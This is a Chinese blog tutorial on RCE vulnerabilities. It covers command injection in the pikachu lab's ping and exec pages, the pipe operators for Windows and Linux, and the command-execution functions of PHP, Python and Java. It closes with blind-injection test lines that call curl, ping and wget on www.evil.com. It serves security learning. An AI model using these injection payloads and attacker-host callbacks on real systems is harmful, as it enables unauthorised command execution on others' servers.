RCE漏洞-远程命令,代码执行

RCE漏洞允许攻击者通过未过滤的输入执行系统命令,本文详细介绍了RCE的概念、实例,如pikachu平台的rce-ping和rce-exec,以及常用管道符在Windows和Linux下的使用。此外,还列举了PHP、Python和Java中的命令执行函数,并给出了Linux系统下的payload示例,强调了测试无回显命令执行的方法。了解这些有助于提升系统的安全性。
摘要由CSDN通过智能技术生成

RCE漏洞

概述

后台提供了运行系统指令或者代码的接口,并且未对输入的数据进行过滤等处理,让攻击者可以直接向后台注入操作系统命令或者代码,进而控制后台。

实例

pikachu平台:

  • rce-ping
    提供了调用操作系统ping指令的接口。
    在这里插入图片描述
    payload:通过管道符拼接其他操作系统指令
    在这里插入图片描述
    显示出后端服务器的当前文件列表等信息。可通过其他指令拼接完成对后台文件的修改。

  • rce-exec
    在这里插入图片描述
    提供了代码执行的接口。
    输入phpinfo();
    在这里插入图片描述
    显示出后端php信息。

常用的管道符

Windows:
"|": 直接执行后面的语句。 如ping 127.0.0.1 | dir 直接执行dir。
"||": 如果前面执行的语句出错,则执行后面的语句。 如ping 2 || dir 会执行dir
"&": 如果前面的语句为假则执行后面的语句,前面的语句可真可假。
"&&": 如果前面的语句为假则出错,也不执行后面的语句,前面的语句只能为真。 

Linux:
";": 执行完前面的再执行后面的。
"|": 显示后面的语句的执行结果。 
"||": 如果前面的语句执行出错,则执行后面的语句。 
"&": 如果前面的语句为假则执行后面的语句,前面的语句可真可假。
"&&": 如果前面的语句为假则出错,也不执行后面的语句,前面的语句只能为真。 

不同语言的命令执行函数

php

  • system
  • exec
  • passthru
  • proc_open
  • shell_exec

python

  • exec
  • execfile
  • eval

java

  • Runtime.getRuntime().exec()

linux系统下的payload

测试无回显的命令执行一般采用dns请求和http请求来判断命令是否正确执行

curl www.evil.com
ping www.evil.com
wget www.evil.com
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值